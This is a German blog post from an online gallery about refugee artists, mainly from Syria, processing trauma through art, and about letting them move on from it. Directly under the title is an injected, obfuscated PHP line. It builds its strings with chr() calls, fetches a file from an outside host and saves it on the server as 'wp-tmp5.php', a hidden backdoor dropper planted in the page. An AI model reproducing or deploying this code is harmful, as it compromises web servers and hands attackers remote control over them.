/, Commercial, Info/Flucht – Trauma – Kunst

Flucht – Trauma – Kunst

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Es ist keine neue Erkenntnis – Kunst kann helfen, erlebte Traumata zu verarbeiten und zu bewältigen.

Wir wissen von den “Musikern in Auschwitz” die in all dem Zynismus – sie mussten vor ihren Mördern spielen, sie unterhalten – dennoch an der Musik festhalten konnten, die Musik half ihnen zu überleben.

Nicht umsonst sind es die Richtungen der Musiktherapie und der Kunsttherapie, die mehr und mehr etabliert sind, weil sie Kommunikation über das gesprochene Wort hinaus erlauben, weil sie direkt am Gefühl andocken.

Mehr und mehr bauen auch Künstler mit Fluchterfahrung (hauptsächlich aus Syrien) hier zu ihrer geografischen Heimat auch eine neue künstlerische Heimat auf.

Erlebte Traumata in Bildern zu verarbeiten ist für alle enorm hilfreich, die Erlebnisse zu Papier und Leinwand zu bringen, sie öffentlich zu machen, auszustellen, darüber zu reden.

Für uns, die Rezipienten dieser Bilder, Ausstellungsbesucher und Kunstkäufer ist es ebenfalls ein tief einschneidenes Erlebnis,die Geschichten, die hinter den Bildern stehen, die zu deren Entstehen geführt haben, zu kennen.

Dennoch ist es wichtig für die Künstler, mit dem Erlebten auch abschließen zu können.

Ein Autor, der über Jahre hinweg Lesungen aus seinem Buch halten muss, in dem er traumatische Erfahrungen beschreibt, kann nicht damit abschließen. Er wird jeden Abend auf Neue damit konfrontiert. Maler, die mit Bildern wie z.B. “Warten auf den Tod” bekannt geworden sind, müssen die Chance bekommen auch mit ihrem Schicksal abzuschließen.

Und das liegt dann auch an uns: Wir müssen diesen Künstlern die Chance geben, mit ihrer Vergangenheit abschließen zu können. Nicht immer die selben schrecklichen Bilder und Geschichten konsumieren zu wollen, mit einem leichten Gruseln im Hintergrund, auch honorieren, wenn der Künstler, die künstlerin abgeschlossen hat und sich neuen Themen zuwenden kann.

By | 2019-06-08T11:07:39+02:00 Juni 8th, 2019|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen